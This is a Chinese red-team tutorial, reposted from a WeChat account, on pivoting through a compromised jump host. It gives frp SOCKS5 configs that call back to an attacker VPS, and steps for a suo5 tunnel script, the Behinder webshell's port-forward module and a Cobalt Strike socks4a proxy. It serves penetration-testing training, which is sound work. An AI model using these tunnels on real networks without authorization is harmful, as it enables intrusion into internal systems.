红队技巧-跳板机出网利用

admin

140450
文章

117
评论

2025年5月13日00:14:02评论1 views字数 1182阅读3分56秒阅读模式

声明：该公众号大部分文章来自作者日常学习笔记，也有部分文章是经过作者授权和其他公众号白名单转载，未经授权，严禁转载，如需转载，联系开白。

请勿利用文章内的相关技术从事非法测试，如因此产生的一切不良后果与文章作者和本公众号无关。

现在只对常读和星标的公众号才展示大图推送，建议大家把“潇湘信安”设为星标，否则可能看不到了！

群里@jack10y师傅重新注册了个公众号，用于分享自己学习过程的一些笔记，感兴趣的师傅可以关注下。

0x00 前言

在红蓝对抗中拿到跳板机后，一般考虑的就是先搭建代理，从而对内网的资产进行测试，下面介绍几种内网代理搭建方式。

0x01 frp+profile

1、cs上线主机（也可以直接用shell工具，非必须cs上线，这里我直接用的之前的笔记，使用的是cs上线）

2、上传frpc.exe和frc.ini到跳板机

3、vps上运行 ./frps -c frps.ini

4、跳板机执行上传的frp

shell  frpc.exe -c frpc.ini

5、配置攻击机的proxyfile 代理服务器，地址为vps地址，端口为 frpc.ini中的remote端口

6、设置代理规则

下为frp配置

frpc.ini配置如下：

[common]server_addr = vps地址server_port = 59972[socks5]type = tcpremote_port = 6012plugin_user = test（账号）plugin = socks5plugin_passwd = test（密码）

frps.ini配置如下

[common]bind_port = 59972

0x02 suo5

1、上传suo5脚本到能访问到的url路径

2、访问可以正常解析

3、目标填写能访问到的suo5.jsp地址，填写账号密码，点击连接即可

4、pro配置代理服务器，地址为本地的127.0.0.1，端口选1111就行

5、配置代理规则

0x03 冰蝎内网穿透模块

1、先冰蝎上马

2、打开内网穿透模块，输入vps地址和转发流量的端口

3、vps执行

./portmap  -p1 59970 -p2 4444 -m 2将本地端口 59970 的流量转发到另一个端口 4444

4、点击开启

5、vps收到流量

6、proxyfile配置代理服务器

7、proxyfile配置规则

0x04 cs 上线socks4a

cs，使用socks4建立一个端口，然后pro选择vps地址和cs生产的端口，选择socks4a，然后创建服务器，然后加一条代理规则，只填写内网的地址，选择刚才创建的代理服务器即可。

1、右击shell->socks server

2、使用socks 4a端口

3、pro设置，端口为cs随机生成的sock端口，勾选socks 4a扩展

4、配置代理规则

下一篇预告不出网的内网穿透

原文始发于微信公众号（潇湘信安）：红队技巧-跳板机出网利用

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

红队技巧-跳板机出网利用

遇到应急心慌慌？给你一份常见的应急响应工具清单（附说明、用法）

【渗透测试】Deathnote靶场渗透测试实录

一篇文章带小白从原理到靶场练习搞懂RCE命令执行漏洞

赏金故事 | 挖掘Netflix Dispatch中的管理员账户接管漏洞

分享一下我的漏洞挖掘经验

大模型时代下，Web指纹识别的现状与未来

从 SOAP 到 SHELL

一次渗透从统一登录到全站用户接管

DeFiVulnLabs靶场全系列详解（三十九）错误的删除数组方式导致数据泄露

伪装成VPN安装程序银狐最新免杀样本分析

发表评论

在线咨询

微信